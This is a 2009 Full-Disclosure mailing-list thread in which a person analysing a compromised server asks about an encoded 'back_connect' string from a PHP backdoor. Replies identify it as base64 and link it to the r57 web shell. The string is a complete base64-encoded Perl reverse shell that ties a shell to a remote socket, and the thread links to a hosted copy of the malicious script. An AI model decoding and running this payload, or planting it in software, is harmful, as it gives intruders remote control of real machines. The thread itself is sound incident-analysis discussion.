
Re: [Full-disclosure] connect back PHP hack



Just as an FYI:

Webscarab and Paros (web application proxies) both have a good Base64
decoder built-in.

This is useful for any sniffed requests using basic authentication as
well.

--Justin

 
On Tue, 2009-02-10 at 14:34 -0500, sr. wrote:
> i really appreciate all of the responses. this is what community is all about.
> 
> i'd seen the "==" in other encoding schemes, but just wasn't sure and
> wanted a quick response...thanks to everyone who responded!
> 
> I'll post the rest of my findings on here asap. i'm looking into an
> old compromised machine. this is nothing new..
> 
> whoever mentioned the r57 shell, you're probably right as the script
> connects to a remote box @ port 11457. this is r57 behaviour.
> 
> i also found a copy of the same script i'm dissecting on someone
> else's box, you can check it out here:
> http://www.menola.org/~matjaz/images/info/o_meni/config.inc.php
> 
> in my case, a bunch of php files were modified. i'll zip everything up
> and host it so you can all analyze...
> 
> thx,
> 
> sr. aka "fabrizio siciliano"
> 
> 
> 
> 
> 
> On Tue, Feb 10, 2009 at 2:10 PM, Gustavo Castro <gcastrop@xxxxxxxxx> wrote:
> > "Sr."
> >
> >  This is base64 encoded.
> >
> > 2009/2/10 sr. <staticrez@xxxxxxxxx>:
> >> can anyone tell me what encoding this is?
> >>
> >> $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
> >> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
> >> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
> >> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
> >> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
> >> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
> >> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
> >>
> >> this has to do with old php 4.x.x version with magic quotes enabled.
> >> i'm just trying to figure out what the connect back code does.
> >>
> >> any input is much appreciated.
> >>
> >> thx,
> >>
> >> sr.
> >
> > --
> > Saludos,
> >     Gustavo Castro Puig.
> >     E-Mail: gcastrop@xxxxxxxxx
> >
> > LPI Level-1 Certified (https://www.lpi.org/es/verify.html
> > LPID:LPI000042304 Verification Code: hp6re8w5qg )
> > Registered Linux User #69342
> >
> 
> 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/